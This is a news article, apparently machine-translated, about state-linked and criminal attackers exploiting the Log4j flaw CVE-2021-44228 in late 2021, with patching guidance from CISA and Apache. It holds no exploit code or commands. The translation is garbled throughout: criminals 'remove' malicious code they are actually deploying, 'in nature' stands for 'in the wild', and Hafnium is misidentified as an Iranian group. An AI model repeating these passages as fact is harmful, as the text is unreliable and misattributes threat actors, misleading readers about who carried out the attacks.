Nation-state attackers wielding Log4j against targets
Third Party Risk Management, Application Security, Breach Notification
Traces of exploits towards China, Iran, North Korea, Turkey; Minecraft servers get ransomware
Mathew J. Schwartz (euroinfosec) •
December 16, 2021
The imperative to find and fix all instances of a vulnerability in widely used Apache software continues to grow.
See also: OnDemand I Shift from threat prevention to cyber resilience
Cyber security experts warn that a number of attackers linked to nation states appear to be abusing or actively testing the Apache Log4j vulnerability. Criminal groups have also started targeting the flaw to remove malicious code, including crypto-lockdown malware, and well-known access brokers are using the flaw to collect corporate access information to sell to. other attackers, including ransomware groups, warn some experts.
Managed by the non-profit Apache Software Foundation, Log4j provides logging capabilities for Java applications and is widely used, including for Apache web server software. The years-old vulnerability is present in the Apache Log4j library, from versions 2.0-beta9 through 2.14.1, and the US Cybersecurity and Infrastructure Security Agency has said organizations should treat the remediation as the highest priority.
Thusday, John graham cumming, CTO of web infrastructure provider Cloudflare, said the company tracks more than 100,000 attempts to find or exploit Log4j per minute.
Unfortunately, the analysis and exploitation of # Log4Shell vulnerabilities have increased beyond 100,000 blocked attacks per minute (peaks of> 2,000 per second) and today appear to be the most active day since this became public. pic.twitter.com/BwVLndrFt8
– John Graham-Cumming (@jgrahamc) December 16, 2021
Designated CVE-2021-44228, the vulnerability “exists in the action that the Java Directory and Naming Interface – JNDI – takes to resolve variables,” CISA said. “Affected versions of Log4j contain JNDI functionality – such as message lookup substitution – that” does not protect against the lightweight, adversary-controlled directory access protocol – LDAP – and other related endpoints to JNDI “”, according to details of the US government’s vulnerability.
The EU’s cybersecurity agency ENISA says that “due to the nature of the vulnerability, its pervasiveness and the complexity of patches in some of the affected environments”, it is imperative that all organizations “assess their potential exposure as soon as possible. “
But it’s unclear when that will be possible, says Mandiant technical director Charles Carmakal. “Companies are struggling to identify all the vulnerable Log4j instances in their business. The application of fixes is not trivial. Many vendors are still in the process of determining whether their software uses Log4j, as organizations anxiously wait to see if they need to apply emergency fixes, ”he says. “Closed-box systems, vendor-managed systems, and software that is no longer maintained – but still running in test or even production environments – add complexity and pain. “
Momentum to mitigate the flaw and apply fixes as soon as possible increased, after cybersecurity firms CrowdStrike and Mandiant this week warned that they had seen Chinese and Iranian APT groups targeting the CVE-2021 vulnerability. 44228.
Microsoft on Wednesday reported seeing a plethora of APT activity, tracing not only China and Iran, but also attackers affiliated with North Korea and Turkey.
“This activity ranges from experimentation during development, to integrating vulnerability to deploying the payload in nature and exploiting against targets to achieve actor goals,” Microsoft said. .
For example, Microsoft says it saw an Iranian APT group known as Charming Kitten, Phosphorus, and TA453, “acquire and make changes to the Log4j exploit,” and it believes the group could now use the attack code. for attacks in nature. .
Microsoft also says it saw an Iranian APT group known as Hafnium, aka APT31 and APT40, use the exploit to identify new targets. The group was linked to a series of zero-day attacks on Exchange servers earlier this year, launched through virtual private servers leased primarily in the United States.
In the latest attacks, “systems associated with Hafnium have been observed using DNS” – or domain name lookup – “a service generally associated with the activity of testing fingerprint systems”, a Microsoft said.
The criminals also targeted the flaw to deploy malware on Linux systems as well as the .NET ransomware called Khonsari against Windows terminals, as detailed by security firm Bitdefender.
Attackers have also attacked Minecraft servers that are not managed by Microsoft, company security researchers warn, saying the aim of the attacks appears to be not only to deploy Khonsari ransomware on the servers, but also to collect credentials for later use.
“While it’s rare for Minecraft to be installed on corporate networks, we’ve also observed PowerShell-based reverse shells being dropped onto Minecraft client systems via the same malicious message technique, giving an actor access complete to a compromised system, which he then uses to run Mimikatz to steal credentials, ”he says. “These techniques are typically associated with corporate compromises with the intention of lateral movement. Microsoft has not observed any tracking activity for this campaign at this time, indicating that the attacker may collect access for use. later. “
Well-known initial access brokers have also targeted the flaw to gain access to corporate networks. “These access brokers then sell access to these networks to ransomware-as-a-service affiliates,” and others, Microsoft explains.
Tips: update to version 2.16
To correct the flaw, Apache released version 2.15.0 of Log4j on Friday. But on Monday, Apache then released Log4j version 2.16, which includes a fix for a recently discovered vulnerability, CVE-2021-45046, which could be used to create a denial of service attack.
Experts recommend that organizations first apply the patch from version 2.16.0 to anything that has not yet been updated to version 2.15.0, and then update all systems from version 2.15 to version 2.16 (see: How to patch Log4j now that version 2.16 is out).
“We are taking urgent action to mitigate this vulnerability and detect any associated threatening activity,” said CISA Director Jen Easterly.
CISA has added CVE-2021-44228 to its list of vulnerabilities known to be exploited. This “forces federal civilian agencies – and signals non-federal partners – to urgently correct or fix this vulnerability,” Easterly said.
“We proactively contact entities whose networks may be vulnerable and use our analysis and intrusion detection tools to help government and industrial partners identify the exposure or exploitation of the vulnerability”, a- she declared.
The CISA urged any US organization that is victim of a Log4j attack to immediately report the incident to the CISA or the FBI.
In addition, CISA continues to provide updated advice on Apache Log4j vulnerabilities and maintains a list of software known to be affected as well as unaffected software, which currently has over 750 entries.
Imperative: rapid attenuation and correction
The CISA has given civilian federal executive agencies a deadline to fix the CVE-2021-44228 vulnerability: December 24. She also urged them to immediately deploy web application firewalls to block attack attempts and set off security operations center alarms if such attacks hit the network.
However, many vendors and software development projects that use the software have yet to determine if their tools are vulnerable and prepare a fix. Before applying patches, experts say organizations should assume that attackers have already used the vulnerability against them, until proven guilty. “The patches do not remove the existing compromise,” says Jake williams, CTO of cybersecurity firm BreachQuest.
Due to the pervasiveness of the vulnerability and the need to update so many different software, John Hultquist, vice president of intelligence analysis at Mandiant, expects the impact of this vulnerability to be make it feel for a while. He says, “The effects of this vulnerability will reverberate for months – maybe even years – as we try to close these doors and hunt down every actor who has entered.”